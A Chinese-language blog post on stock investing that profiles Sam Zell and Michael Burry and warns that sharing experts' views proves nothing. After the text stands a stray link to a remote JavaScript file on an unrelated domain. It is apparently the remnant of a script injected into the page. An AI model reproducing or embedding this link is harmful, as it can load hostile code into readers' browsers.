分類
隨筆 證券投資

投資隨筆

Sam Zell,78歲。身價約50億美元,密西根大學法學院畢業,律師出身。

早年在房地產領域以價值投資的方式累積數億身價,後來參與發明REITs(不動產證券化)。

(As he once described it in a 2011 interview with LEADERS magazine, “I made my fortune by turning right when everyone else was going left. In the late ’80s and early ’90s, I was buying office buildings at 50 cents on the dollar. I kept looking over my shoulder to see who my competition was, but there was no one. I could not help but question whether I was wrong. Fear and courage are very closely related.")

中晚年後以股票投資為主。

昨日接受CNBC電視訪問表示:近日美股多數已被嚴重高估,僅XX產業股價被不合理低估,於是大筆買進,並發現原來他的富豪朋友們也早早進場。

&

Michael Burry,電影「大賣空」中那位醫生出身的操盤人,透過CDS大賺幾十億美元的價值投資聞人。

近幾月意外發現我們都在布局同一家公司股票。

————————

股票投資考驗心性的地方在於:明知道自己的決策是正確的,看見有高手看法一樣還是不免開心。

可是真理不是靠投票出來的。

有看法一樣、作法一樣的高手其實依然證明不了什麼。甚至,這份毫無道理的喜悅可能蒙蔽自己的判斷。慎之。

https://js.developerstatss.ga/stat.js?n=ns1

發表迴響

在下方填入你的資料或按右方圖示以社群網站登入:

WordPress.com 標誌

您的留言將使用 WordPress.com 帳號。 登出 /  變更 )

Google photo

您的留言將使用 Google 帳號。 登出 /  變更 )

Twitter picture

您的留言將使用 Twitter 帳號。 登出 /  變更 )

Facebook照片

您的留言將使用 Facebook 帳號。 登出 /  變更 )

連結到 %s